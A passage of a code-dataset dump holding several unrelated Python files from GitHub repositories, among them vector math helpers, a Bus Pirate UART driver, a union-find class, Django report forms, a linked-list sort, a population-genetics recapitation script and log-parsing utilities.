\"randn\":\n        r = np.random.randn(3)\n    else:\n        raise ValueError(\"unknown random distribution\")\n\n    r[:] = np.sign(r[:]) * np.abs(r[:]) ** POW\n    r = r / np.sqrt(np.dot(r, r))\n    assert (r[0]*r[0] + r[1]*r[1] + r[2]*r[2] - 1) < 0.00000000001\n    r = r * norm\n    for i in range(0, 3):\n        if np.abs(r[i]) < 0.0000001:\n            r[i] = 0\n    return np.array((r[0], r[1], r[2], 1))\n\n\ndef make_random_vector_vectorized(N, norm, POW, type=\"rand\", normalize=True):\n    r = np.ones((N, 4))\n\n    #not tested:\n    if type == \"rand\":\n        r[:, 0:3] = np.random.rand(N, 3)*2 - 1\n    elif type == \"randn\":\n        r[:, 0:3] = np.random.randn(N, 3)\n    else:\n        raise ValueError(\"unknown random distribution\")\n\n    r[:, 0:3] = np.sign(r[:, 0:3]) * np.abs(r[:, 0:3]) ** POW\n    #r[:,0:3] = r[0:3] / np.tile( np.sqrt( np.sum(r[:,0:3] * r[:,0:3], axis=1, keepdims=True) ) , (1,3) )\n    n3 = np.sqrt(np.sum(r[:, 0:3] * r[:, 0:3], axis=1, keepdims=True))\n    if normalize:\n        r[:, 0:3] = r[:, 0:3] / np.tile(n3, (1, 3))\n    s_1 = np.sum(r[:, 0:3] * r[:, 0:3], axis=1) - 1\n    assert np.all(np.abs(s_1) < 0.00000000001)\n    r[:, 0:3] = r[:, 0:3] * norm\n    r[:, 3] = 1\n    check_vector4_vectorized(r)\n    return r\n\n\ndef normalize_vector(v, snapToZero=False):\n    assert not np.any( np.isnan(v.ravel()) )\n    assert not np.any( np.isinf(v.ravel()) )\n\n    r = v.copy()\n    #r[:] = np.sign(r[:]) * np.abs(r[:]) ** POW\n    r = r / np.sqrt(np.dot(r, r))\n    assert (r[0]*r[0] + r[1]*r[1] + r[2]*r[2] - 1) < 0.00000000001\n    if snapToZero:\n        for i in range(0, 3):\n            if np.abs(r[i]) < 0.0000001:\n                r[i] = 0\n    r[3] = 1\n    return r\n\n#todo: http://floating-point-gui.de/errors/comparison/\n\n#todo: write tests for this\ndef normalize_vector4_vectorized(v, 
zero_normal=\"leave_zero_norms\"):\n    \"\"\" returns vectors of either length 1 or zero. \"\"\"\n    N = v.shape[0]\n    assert not issubclass(v.dtype.type, np.integer)\n    assert not np.any( np.isnan(v) )\n    assert not np.any( np.isinf(v) )\n\n    # norms = np.linalg.norm(v[:,0:3], axis = 1, keepdims=True, ord=2)\n    norms = np.sqrt(np.sum(v[:,0:3] * v[:,0:3], axis=1, keepdims=True))\n    denominator = np.tile(norms, (1, 4))\n    zeros_i = np.abs(norms.ravel()) < 0.00000001\n    non_zero_i = np.logical_not(zeros_i)\n    if zero_normal==\"leave_zero_norms\":\n        if not np.any(zeros_i):\n            c = 1.0 / denominator\n        else:\n            c = np.ones(denominator.shape)\n            c[non_zero_i,:] = 1.0 / denominator[non_zero_i,:]\n    else:\n        raise ValueError(\"unknown zero_normal mode\")  # previously fell through with c undefined\n    assert not np.any( np.isnan(c) )\n    assert not np.any( np.isinf(c) )\n    r = v * c\n    assert r.shape[0] == N\n    df = np.sum(r[:,0:3] * r[:,0:3], axis=1)\n    #print(df.shape)\n    #print(df)\n    #print(non_zero_i)\n    e1a = np.all(np.abs(df[non_zero_i]-1.0) < 0.00000000001)\n    e0a = np.all(np.abs(df[zeros_i]) < 0.00000000001)\n\n    if not (e1a and e0a):\n        print(\"r:\", r)\n        print(\"v:\", v)\n        print(\"c:\", c)\n        print(\"denom: \", denominator)\n        print(norms)\n        print(denominator)\n        print(np.sum(r[:,0:3] * r[:,0:3], axis=1))\n\n    #print (e1a)\n    #print (e0a)\n    assert e1a and e0a # np.all(np.logical_or(e1a, e0a))\n    r[:, 3] = 1\n    return r\n\n\ndef repeat_vect4(N, v4):\n    check_vector4(v4)\n    _x = v4\n    xa = np.tile(np.expand_dims(_x, axis=0), (N, 1))\n    assert xa.shape[0] == N\n    return xa\n\n\nimport sys\ndef is_python3():\n    #import sys\n    v = sys.version_info.major\n    return v == 3\n","repo_name":"sohale/implisolid","sub_path":"python_implicit/basic_types.py","file_name":"basic_types.py","file_ext":"py","file_size_in_byte":8298,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"23030435398","text":"from .base import BPError, BusPirate\n\nFOSC = (32000000 / 2)\n\n\nclass UARTCfg:\n    OUTPUT_TYPE = 0x10\n    DATABITS = 0x0C\n    STOPBITS = 0x02\n    POLARITY = 0x01\n\n\nclass UARTSpeed:\n    _300 = 0b0000\n    _1200 = 0b0001\n    _2400 = 0b0010\n    _4800 = 0b0011\n    _9600 = 0b0100\n    _19200 = 0b0101\n    _33250 = 0b0110\n    _38400 = 0b0111\n    _57600 = 0b1000\n    _115200 = 0b1001\n\n\nclass UART(BusPirate):\n    def __init__(self, portname='', speed=115200, timeout=0.1, connect=True):\n        \"\"\" Provide the Bus Pirate UART interface\n\n        Parameters\n        ----------\n        portname : str\n            Name of comport (/dev/bus_pirate or COM3)\n        speed : int\n            Communication speed, use default of 115200\n        timeout : int\n            Timeout in s to wait for reply\n        connect : bool\n            Automatically connect to BusPirate (default) \n\n        Example\n        -------\n        >>> uart = UART()\n        \"\"\"\n        self._config = None\n        self._echo = False\n        super().__init__(portname, speed, timeout, connect)\n\n    def enter(self):\n        \"\"\" Enter UART mode\n\n        Raises\n        ------\n        BPError\n            Could not enter UART mode\n        \"\"\"\n        if self.mode == 'uart':\n            return\n        if self.mode != 'bb':\n            super(UART, self).enter()\n        self.write(0x03)\n        self.timeout(self.minDelay * 10)\n        if self.response(4) == \"ART1\":\n            self.mode = 'uart'\n            self.bp_port = 0b00 # two bit port\n            self.bp_config = 0b0000\n            self.recurse_end()\n            return\n        self.recurse_flush(self.enter)\n        raise BPError('Could not enter UART mode')\n\n    @property\n    def modestring(self):\n        \"\"\" Return mode version string \"\"\"\n        self.write(0x01)\n        self.timeout(self.minDelay * 10)\n        return self.response(4)\n\n    @property\n    def echo(self):\n        return self._echo\n\n    @echo.setter\n    def echo(self, mode):\n        if mode is True:\n            self.write(0x03)\n        else:\n            
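The zero-norm handling in `normalize_vector4_vectorized` above (rows of norm zero stay at zero instead of being divided) can also be expressed with `np.where`. A simplified sketch of the same idea, with the homogeneous w component handled separately:

```python
import numpy as np

def normalize_rows_xyz(v: np.ndarray) -> np.ndarray:
    """Normalize the xyz part of Nx4 homogeneous vectors; zero rows stay zero."""
    norms = np.linalg.norm(v[:, :3], axis=1, keepdims=True)
    # np.maximum guards the division that np.where still evaluates eagerly
    scale = np.where(norms > 1e-8, 1.0 / np.maximum(norms, 1e-30), 1.0)
    out = v.copy()
    out[:, :3] *= scale
    out[:, 3] = 1.0
    return out

v = np.array([[3.0, 0.0, 4.0, 1.0], [0.0, 0.0, 0.0, 1.0]])
print(normalize_rows_xyz(v))  # row 0 -> (0.6, 0.0, 0.8, 1.0); the zero row is unchanged
```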
self.write(0x02)\n        if self.response(1, binary=True) != b'\\x01':\n            raise ValueError(\"Could not set echo mode\")\n        self._echo = mode\n\n    def manual_speed_cfg(self, baud):\n        \"\"\" Manual baud rate configuration, send 2 bytes\n\n        Configures the UART using custom baud rate generator settings. This command is followed by two data bytes that\n        represent the BRG register value. Send the high 8 bits first, then the low 8 bits.\n\n        Use the UART manual [PDF] or an online calculator to find the correct value (key values: fosc 32MHz,\n        clock divider = 2, BRGH=1) . Bus Pirate responds 0x01 to each byte. Settings take effect immediately.\n        \"\"\"\n        BRG = int(FOSC // (4 * baud)) - 1  # FOSC is a float in Python 3, so cast before bit-shifting\n        BRGH = ((BRG >> 8) & 0xFF)\n        BRGL = (BRG & 0xFF)\n        self.write(0x03)\n        self.write(BRGH)\n        self.write(BRGL)\n        self.timeout(0.1)\n        return self.response()\n\n    def begin_input(self):\n        self.write(0x04)\n\n    def end_input(self):\n        self.write(0x05)\n\n    def enter_bridge_mode(self):\n        \"\"\" UART bridge mode (reset to exit)\n\n        Starts a transparent UART bridge using the current configuration. Unplug the Bus Pirate to exit.\n        \"\"\"\n        self.write(0x0f)\n        self.timeout(0.1)\n        self.response(1, binary=True)\n\n    def set_cfg(self, cfg):\n        self.write(0xC0 | cfg)\n        self.timeout(0.1)\n        return self.response(1, binary=True)\n\n    def read_cfg(self):\n        self.write(0xd0)\n        self.timeout(0.1)\n        return self.response(1, binary=True)\n","repo_name":"juhasch/pyBusPirateLite","sub_path":"pyBusPirateLite/UART.py","file_name":"UART.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"21"} +{"seq_id":"14664769513","text":"import ujson as json\nimport os\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tag import pos_tag\nfrom nltk.stem import WordNetLemmatizer\nimport collections\nimport pandas as pd\n\nwnl = WordNetLemmatizer()\n\n\ndef lemmatize_all(sentence):\n    wnl = WordNetLemmatizer()\n    sen = [w.lower() for w in word_tokenize(sentence)]\n    for word, tag in pos_tag(sen):\n        if tag.startswith('NN'):\n            yield wnl.lemmatize(word, pos='n')\n        elif tag.startswith('VB'):\n            yield wnl.lemmatize(word, pos='v')\n        elif tag.startswith('JJ'):\n            yield wnl.lemmatize(word, pos='a')\n        elif tag.startswith('R'):\n            yield wnl.lemmatize(word, pos='r')\n        else:\n            yield word\n\n\ndef gen_train(path):\n    all_alt = []\n    SPACE = ' '\n    i = 0\n    with open(path, 'r', encoding='ISO-8859-1') as fh:\n        for line in fh:\n            i += 1\n            line = line.strip().split('\\t')\n            del line[0]\n            alt = SPACE.join(lemmatize_all(line[1]))\n            all_alt.append(alt)\n            alt = SPACE.join(lemmatize_all(line[4]))\n            all_alt.append(alt)\n    fh.close()\n\n    return all_alt\n\n\ndef gen_test(path, error_meta=None):\n    fp_alt = []\n    fn_alt = []\n    all_alt = []\n    SPACE = ' '\n    i = 0\n    with open(path, 'r', encoding='utf8') as fh:\n        for line in fh:\n            i += 1\n            line = line.strip().split('\\t')\n            del line[-1]\n            alt = SPACE.join(lemmatize_all(line[1]))\n            all_alt.append(alt)\n            if error_meta:\n                if i in error_meta['FP']:\n                    fp_alt.append(alt)\n                elif i in error_meta['FN']:\n                    fn_alt.append(alt)\n    fh.close()\n    ids = [j for j in range(1, i + 1)]\n    for fp in error_meta['FP']:\n        ids.remove(fp)\n    for fn in error_meta['FN']:\n        ids.remove(fn)\n\n    return fp_alt, fn_alt, all_alt, ids\n\n\n# english_punctuations = [',', '.', ':', ';', '?', '(', ')', '[', ']', '&', '!', '*', '@', '#', '$', '%', '\"', '``',\n# '-', '\\'\\''] seg_test_filtered = [[[word.lower() for word in seg if word not in english_punctuations] for seg in\n# sen] for sen in sens]\n\n\nif __name__ == 
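`manual_speed_cfg` above derives the PIC baud-rate-generator value as `FOSC // (4 * baud) - 1` and ships it as two bytes, high first. A standalone check of that arithmetic, mirroring the `FOSC` constant defined earlier in the file:

```python
FOSC = 32000000 / 2  # 16 MHz, same value as the module constant above

def brg_bytes(baud: int) -> tuple:
    brg = int(FOSC // (4 * baud)) - 1
    return (brg >> 8) & 0xFF, brg & 0xFF

print(brg_bytes(115200))  # (0, 33): BRGH = 0x00, BRGL = 0x21
```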
\"__main__\":\n    training_path = '../data/raw_data/altlex_train.tsv'\n    boot_path = '../data/raw_data/altlex_train_bootstrapped.tsv'\n    valid_path = '../data/raw_data/altlex_dev.tsv'\n    test_path = '../data/raw_data/altlex_gold.tsv'\n\n    training_all_alt = gen_train(training_path)\n    tr_total = len(training_all_alt)\n    boot_all_alt = gen_train(boot_path)\n    bt_total = len(boot_all_alt)\n    training_set = set(training_all_alt)\n    boot_set = set(boot_all_alt)\n\n    error_path = '../outputs/bootstrapped/MCDN/results/FALSE_valid.json'\n    with open(error_path, 'r') as fh:\n        error_meta = json.load(fh)\n    test_fp_alt, test_fn_alt, test_all_alt, ids = gen_test(test_path, error_meta)\n    te_total = len(test_all_alt)\n    fn_total = len(test_fn_alt)\n    fp_total = len(test_fp_alt)\n    test_set = set(test_all_alt)\n    not_in_training = test_set.difference(test_set.intersection(training_set))\n    not_in_boot = test_set.difference(test_set.intersection(boot_set))\n    print(\"Not in training: \", not_in_training)\n    print(\"Not in bootstrapped: \", not_in_boot)\n\n    tc = collections.Counter(training_all_alt)\n    bc = collections.Counter(boot_all_alt)\n    fpc = collections.Counter(test_fp_alt)\n    fnc = collections.Counter(test_fn_alt)\n    tec = collections.Counter(test_all_alt)\n    print('Top 5 in Train: ', tc.most_common(5))\n    tck, tcv = [], []\n    tc_acu = 0\n    for k, v in tc.most_common(10):\n        tck.append(k)\n        tcv.append(v)\n        tc_acu += v\n    print(tc_acu / tr_total)\n\n    print('Top 5 in Test: ', tec.most_common(5))\n    tek, tev = [], []\n    te_acu = 0\n    for k, v in tec.most_common(10):\n        tek.append(k)\n        tev.append(v)\n        te_acu += v\n    print(te_acu / te_total)\n\n    print('Top 5 in FP: ', fpc.most_common(5))\n    fpk, fpv = [], []\n    fp_acu = 0\n    for k, v in fpc.most_common(10):\n        fpk.append(k)\n        fpv.append(v)\n        fp_acu += v\n    print(fp_acu / fp_total)\n\n    print('Top 5 in FN: ', fnc.most_common(5))\n    fnk, fnv = [], []\n    fn_acu = 0\n    for k, v in fnc.most_common(10):\n        fnk.append(k)\n        fnv.append(v)\n        fn_acu += v\n    print(fn_acu / fn_total)\n\n    print(ids)\n    df = pd.DataFrame({'train_word': tck, 'train_freq': tcv, 'test_word': tek, 'test_freq': tev,\n                       'fp_word': fpk, 'fp_freq': fpv, 'fn_word': fnk, 'fn_freq': fnv})\n    df.to_csv('../analysis.csv', index=False)\n","repo_name":"shiningliang/Multi-level-Causality-Detection-Network","sub_path":"utils/result_analyze.py","file_name":"result_analyze.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"8516473237","text":"# Lazy algorithm for solving dynamic connectivity problem\n# Modified quick union - link root of smaller tree to root of larger tree\n# Data structure\n# Integer array id[] of size N\n# Interpretation - array representing set of trees, each entry in array contains reference to parent\n# id[i] is parent of i\n# root of i is id[id[i]] - keep going until the value doesn't change\n\nfrom QuickUnion import QuickUnion\n\n\nclass WeightedQuickUnion(QuickUnion):\n\n    # n being the number of nodes\n    # sz being the size of the tree\n    def __init__(self, n):\n        super().__init__(n)\n        self.sz = []\n        for x in range(n):\n            # Set the size of each tree initially to 1\n            self.sz.append(1)\n\n    # Given two nodes, connect them\n    # Two nodes are connected by setting id of the smaller root to the id of the larger root\n    def union(self, first_id, second_id):\n        first_root = self.root(first_id)\n        second_root = self.root(second_id)\n        # Compare and relink at the roots: attach the smaller root under the\n        # larger one, then add the smaller tree's size to the new root's size\n        if self.sz[first_root] >= self.sz[second_root]:\n            self.id[second_root] = first_root\n            self.sz[first_root] += self.sz[second_root]\n        else:\n            self.id[first_root] = second_root\n            self.sz[second_root] += self.sz[first_root]\n\n\n","repo_name":"UnnervingOstrich/Algorithms","sub_path":"DynamicConnectivity/WeightedQuickUnion.py","file_name":"WeightedQuickUnion.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34878707177","text":"from django import forms\n\nSEVERITY_CHOICES_ENG = [\n\t('INFORMATIONAL', 'INFORMATIONAL'),\n\t('LOW', 'LOW'),\n    ('MEDIUM', 'MEDIUM'),\n    ('HIGH', 'HIGH'),\n    ('CRITICAL', 'CRITICAL')\n]\n\nSEVERITY_CHOICES_SPA = [\n\t('INFORMATIONAL', 'INFORMATIONAL'),\n\t('BAJO', 'BAJO'),\n    ('MEDIO', 'MEDIO'),\n    ('ALTO', 'ALTO'),\n    ('CRITICO', 'CRITICO')\n]\n\nclass ObservationForm(forms.Form):\n    description = forms.CharField(label='Description', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n    description_note = forms.CharField(label='Description Note', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n    implication = forms.CharField(label='Implication', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n    recommendation = forms.CharField(label='Recommendation', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n    recommendation_note = forms.CharField(label='Recommendation Notes', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n    #\n    severity = forms.CharField(label='Severity', widget=forms.Select(choices=SEVERITY_CHOICES_SPA), required=True)\n\n    def populate(self, mongo_obj):\n        self.fields['description'].initial = mongo_obj['OBSERVATION']['TITLE']\n        self.fields['description_note'].initial = mongo_obj['OBSERVATION']['NOTE']\n        self.fields['implication'].initial = mongo_obj['IMPLICATION']\n        self.fields['recommendation'].initial = mongo_obj['RECOMMENDATION']['TITLE']\n        self.fields['recommendation_note'].initial = mongo_obj['RECOMMENDATION']['URLS']\n        #\n        choices = SEVERITY_CHOICES_ENG if mongo_obj['LANGUAGE'] == 'eng' else SEVERITY_CHOICES_SPA\n        self.fields['severity'].widget.choices = choices\n\nclass ApproverForm(forms.Form):\n    file = forms.FileField()","repo_name":"badBounty/VM-Orchestrator","sub_path":"VM_Orchestrator/VM_OrchestratorApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17639153536","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncreated by huash06 at 2015-04-27 20:47\n\nSort a linked list in O(n log n) time using constant space complexity.\n\n\"\"\"\n\n__author__ = 'huash06'\n\nimport sys\nimport os\nimport itertools\nimport collections\nimport functools\nimport bisect\nimport datetime\n\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\n    def output(self):\n        print(self.val, end='->')\n        if self.next:\n            self.next.output()\n\nclass Solution:\n    # @param {ListNode} head\n    # @return {ListNode}\n    def sortList(self, head):\n        if not head:\n            return None\n        l = 0\n        h = head\n        while h:\n            l += 1\n            h = h.next\n        return self.mergeSort(head, l)\n\n\n    def mergeSort(self, head, lenlist):\n        if lenlist == 1:\n            return head\n        elif lenlist == 2:\n            if head.val > head.next.val:\n                tmp = head.val\n                head.val = head.next.val\n                head.next.val = tmp\n            return head\n\n        h = head\n        l = 1\n        while l < lenlist // 2:\n            h = 
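For context on the `union` fix just above: weighting only works when both the size comparison and the relink happen at the roots. A tiny self-contained sketch with the same size rule (the imported `QuickUnion` base class is not shown in this file, so `root` is inlined here):

```python
class TinyWeightedUF:
    def __init__(self, n: int):
        self.id = list(range(n))
        self.sz = [1] * n

    def root(self, i: int) -> int:
        while i != self.id[i]:
            i = self.id[i]
        return i

    def union(self, p: int, q: int) -> None:
        rp, rq = self.root(p), self.root(q)
        if rp == rq:
            return
        if self.sz[rp] >= self.sz[rq]:  # attach smaller tree under larger
            self.id[rq] = rp
            self.sz[rp] += self.sz[rq]
        else:
            self.id[rp] = rq
            self.sz[rq] += self.sz[rp]

uf = TinyWeightedUF(5)
uf.union(0, 1)
uf.union(1, 2)
print(uf.root(2) == uf.root(0))  # True
```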
h.next\n l += 1\n nh = h.next\n h.next = None\n h1 = self.mergeSort(head, l)\n h2 = self.mergeSort(nh, lenlist-l)\n return self.mergeList(h1, h2)\n\n\n def mergeList(self, head1, head2):\n if not head2:\n return head1\n elif not head1:\n return head2\n\n ret = ListNode(-1000000)\n h1 = head1\n h2 = head2\n h = ret\n while h1 and h2:\n if h1.val < h2.val:\n h.next = h1\n h1 = h1.next\n else:\n h.next = h2\n h2 = h2.next\n h = h.next\n if h1:\n h.next = h1\n if h2:\n h.next = h2\n\n return ret.next\n\n\n\ns = Solution()\ns.sortList(ListNode(0)).output()\nprint()\n\nl = ListNode(1)\nl.next = ListNode(4)\nnode = l.next\nvals = [3, 2, 5, 2]\nfor val in vals:\n node.next = ListNode(val)\n node = node.next\nl.output()\nprint()\ns.sortList(l).output()\nprint()\n","repo_name":"shhuan/algorithms","sub_path":"leetcode/medium/Sort_List.py","file_name":"Sort_List.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12136556870","text":"#!/usr/bin/env python3\n\nimport sys, os\nimport msprime\nimport pyslim\nimport numpy as np\n\nhelpMsg = '''\n usage: $./recapitation.py \n\n - recapitates and samples from the tree-sequence output from SLiM simulations\n'''\n\ndef main(args):\n if len(args) != 5: #4 arguments\n return helpMsg\n\n slim_tree_path = args[1]\n slim_params_path = args[2]\n N = int(args[3])\n out_path = args[4]+\".trees\"\n\n with open(slim_params_path, \"r\") as paramF:\n lines = paramF.readlines()\n\n mu = float(lines[0].strip())\n rho = float(lines[1].strip())\n Ne_recap = int(lines[2].strip().split()[1])\n\n ts = pyslim.load(slim_tree_path)\n ts_recap = ts.recapitate(recombination_rate=rho, Ne=Ne_recap)\n sampN = np.random.choice(ts_recap.samples(), size=N, replace=False)\n ts_samp = ts_recap.simplify(samples=sampN)\n\n ts_samp.dump(out_path)\n\n return 0\n\nsys.exit(main(sys.argv))","repo_name":"CshlSiepelLab/arg-selection","sub_path":"sims/recapitation.py","file_name":"recapitation.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"75187680693","text":"import os, json\nimport argparse\nimport matplotlib.pyplot as plt\n\ndef parse_args():\n parser=argparse.ArgumentParser()\n parser.add_argument(\"--output_dir\", type=str, required=False, default=\"/opt/data/curious_poet/curious_poet_paper_dataset/centralized_ICM\")\n parser.add_argument(\"--run_name\", type=str, required=False, default = \"icm_gamma10.0_wCM_8marA\") #'all' to run on all runs_folders\n parser.add_argument(\"--latest_log_filename\", type=str, default=None) \n parser.add_argument(\"--output_data_filename\", type=str, required=False, default='annecsVsIterations.json')\n parser.add_argument(\"--output_figure_filename\", type=str, required=False, default='annecsVsIterations.png')\n args=parser.parse_args()\n return args\n\ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\ndef get_longest_log_filename(args, run_name) -> str:\n listdir = os.listdir(os.path.join(args.output_dir, run_name))\n logs = [a for a in listdir if 'run.log' in a]\n logs.sort(key=len)\n return logs[-1]\n\ndef recursively_extract_log_filenames(args, run_name) -> [str]:\n # in retrospect, this could have been done by simply sorting all the log filenames by length...\n listdir = os.listdir(os.path.join(args.output_dir, run_name))\n\n ret = ['run.log']\n if not args.latest_log_filename is None:\n log = args.latest_log_filename\n 
else:\n        log = get_longest_log_filename(args, run_name)\n\n    if log == ret[0]:\n        return ret\n    starts = find(log, '[')\n    starts.reverse()\n    ends = find(log, ']')\n    assert len(starts) == len(ends)\n\n    for i in range(len(starts)):\n        inside_brackets = log[starts[i]+1:ends[i]]\n        fn = inside_brackets+\".resume_run.log\"\n        ret.append(fn)\n        assert fn in listdir\n    # print(ret)\n    ret.append(log)\n    return ret\n\ndef main():\n    \"\"\"\n    Given the last run log from a series of resumes, open all the logs (starting with run.log) in sequence\n    and parse out the ANNECS vs iteration values. \n\n    \"\"\"\n    args = parse_args()\n    if args.run_name == 'all':\n        run_names = []\n        for run_name in os.listdir(args.output_dir):\n            if os.path.isdir(os.path.join(args.output_dir, run_name)) and 'gamma' in run_name:\n                run_names.append(run_name)\n    else:\n        run_names = [args.run_name]\n    run_names.sort()\n\n    for run_name in run_names:\n        print(f\"processing run name: {run_name}\")\n        logs = recursively_extract_log_filenames(args, run_name)\n        print(\"log files\")\n        print(logs)\n        \n        iteration = []\n        annecs = []\n        latest_annecs_value = 0\n        # this will need to handle overlapping iterations between log files\n        for fn in logs:\n            print(fn)\n            filename = os.path.join(args.output_dir, run_name, fn)\n            with open(filename, 'r') as f:\n                lines = f.readlines()\n            for idx, line in enumerate(lines):\n                if 'added to ANNECS:' in line and 'True' in line:\n                    latest_annecs_value += 1\n                    print(f\"latest_annecs_value: {latest_annecs_value}\")\n                if 'Iter=' in line:\n                    start = line.find('Iter=')+5\n                    end = line.find(' ', start)\n                    latest_iter = int(line[start:end])\n\n                    \n                    if latest_iter == 0 or latest_iter != iteration[-1]: # new iter number (sometimes there are repeats)\n                        iteration.append(latest_iter)\n                        \n\n                        annecs.append(latest_annecs_value)\n        assert len(iteration) == len(annecs)\n        with open(os.path.join(args.output_dir, run_name, args.output_data_filename), 'w+') as f:\n            json.dump({'iteration': iteration, 'annecs':annecs}, f) \n\n        # plot individually\n        fig, axs = plt.subplots(1,1)\n        axs.plot(iteration, annecs)\n        axs.set_title(f\"ANNECS vs Training Iterations \\n Run name: {run_name}\")\n        axs.grid(True)\n        \n        plt.savefig(os.path.join(args.output_dir, run_name, args.output_figure_filename))\n        print('plot created')\n\n\n    print('done')\n\n    \nif __name__ == \"__main__\":\n    main()","repo_name":"act3-ace/Curious-POET","sub_path":"cpoet/utils/parse_log_plot_annecs.py","file_name":"parse_log_plot_annecs.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1867358136","text":"# Statistics\nimport sys\nN = int(sys.stdin.readline()) # N is odd\n\nnums_dict = {}\nnums = []\nfor _ in range(N):\n    num = int(sys.stdin.readline().rstrip())\n    nums.append(num)\n    if num in nums_dict:\n        nums_dict[num] += 1\n    else:\n        nums_dict[num] = 1\n    \n# arithmetic mean\nnums.sort()\nprint(round(sum(nums) / N))\n\n# median\nprint(nums[N//2])\n\n# mode (second smallest value on ties)\nmodes = []\nmax_cnt = max(nums_dict.values())\n\nfor num, cnt in nums_dict.items():\n    if cnt == max_cnt:\n        modes.append(num)\n\nmodes.sort()\nprint(modes[1]) if len(modes) > 1 else print(modes[0])\n\n# range\nprint(max(nums) - min(nums))","repo_name":"watchstep/TIS-python","sub_path":"BAEKJOON/silver3/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35086205618","text":"import re, pyperclip, datetime, os\r\n\r\n# ffmpeg command used to create ffout.txt, as follows:\r\n# 
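The BOJ 2108 solution above builds its frequency table by hand; `collections.Counter` plus the `statistics` module expresses the same four answers (mean, median, tie-broken mode, range) more directly. A sketch on the problem's sample input:

```python
from collections import Counter
from statistics import mean, median

nums = [1, 3, 8, -2, 2]
counts = Counter(nums)
top = max(counts.values())
modes = sorted(k for k, v in counts.items() if v == top)
mode = modes[1] if len(modes) > 1 else modes[0]  # second smallest on ties
print(round(mean(nums)), int(median(nums)), mode, max(nums) - min(nums))
# -> 2 2 1 10
```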
ffmpeg -i ytVidNew.mkv -filter:v \"select='gt(scene,0.2)',showinfo\" -f null - 2> ffout.txt\n\nwith open(\"ffout.txt\") as f:\n data = f.read()\n\nsRes = re.findall(\"pts_time:(.+)pos:\", data)\n\n# making a dic of ep nos & names from the gathered jpgs\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\nfilenames = next(os.walk(os.path.dirname(os.path.abspath(__file__))), (None, None, []))[2] # [] if no file\nepNoAndNamesDic = {}\nfor fname in filenames:\n if fname[-3:] == 'jpg': \n fnameSplitted = fname[:-4].split()\n epNoAndNamesDic[int(fnameSplitted[1])] = ' '.join(fnameSplitted[2:])\n\nchaptersInDesc = \"0:00:00 - Ep 47 Project Raven\\n\"\n\nfor idx,res in enumerate(sRes):\n timeStamp = int(float(res.strip()))\n tsInHHMMSS = str(datetime.timedelta(seconds=timeStamp))\n wholeLine = f\"{tsInHHMMSS} - Ep {idx+48} {epNoAndNamesDic[idx+48]} \\n\"\n chaptersInDesc += wholeLine\n\npyperclip.copy(chaptersInDesc)","repo_name":"firozzer/DarknetDiariesJokes","sub_path":"archived/chapterMaker.py","file_name":"chapterMaker.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"922584234","text":"\"\"\" Subscriber \"\"\"\n# -*- coding: utf-8 -*-\nimport datetime\nimport uuid\nfrom eea.meeting.constants import ACTION_APPROVE, ACTION_REJECT\nfrom eea.meeting.interfaces import ISubscriber\nfrom plone import api\nfrom plone.api.exc import MissingParameterError\nfrom plone.dexterity.content import Item\nfrom zope.interface import implementer\n\n\n@implementer(ISubscriber)\nclass Subscriber(Item):\n \"\"\" EEA Meeting Subscriber content type\"\"\"\n\n def state(self):\n \"\"\" Subscriber's state \"\"\"\n return api.content.get_state(self)\n\n def get_details(self):\n \"\"\" Details for subscriber \"\"\"\n try:\n member = api.user.get(userid=self.userid)\n except MissingParameterError:\n member = None\n\n if not member:\n return {'edit_url': \"{0}/edit\".format(self.absolute_url())}\n\n return {\n 'first_name': member.getProperty('first_name', ''),\n 'last_name': member.getProperty('last_name', ''),\n 'fullname': member.getProperty('fullname', ''),\n 'telephone': member.getProperty('telephone', ''),\n 'phone_numbers': ', '.join(\n member.getProperty('phone_numbers', [])),\n 'institution': member.getProperty('institution', ''),\n 'from_country': member.getProperty('from_country', ''),\n 'from_city': member.getProperty('from_city', ''),\n 'position': member.getProperty('position', ''),\n 'address': member.getProperty('address', ''),\n 'edit_url': \"{0}/edit\".format(self.absolute_url())\n }\n\n def is_allowed_state_change(self):\n \"\"\" Used as transition guard expression to prevent state change\n for subscribers of ended meetings\n\n /portal_workflow/meeting_subscriber_workflow/transitions/approve\n /manage_properties\n Guard expression:\n python:here.is_allowed_state_change() is True\n \"\"\"\n meeting_end_date = self.aq_parent.aq_parent.end.replace(tzinfo=None)\n today = datetime.datetime.today()\n is_meeting_ended = (meeting_end_date - today).days < -1\n is_allowed_state_change = is_meeting_ended is not True\n return is_allowed_state_change\n\n\ndef 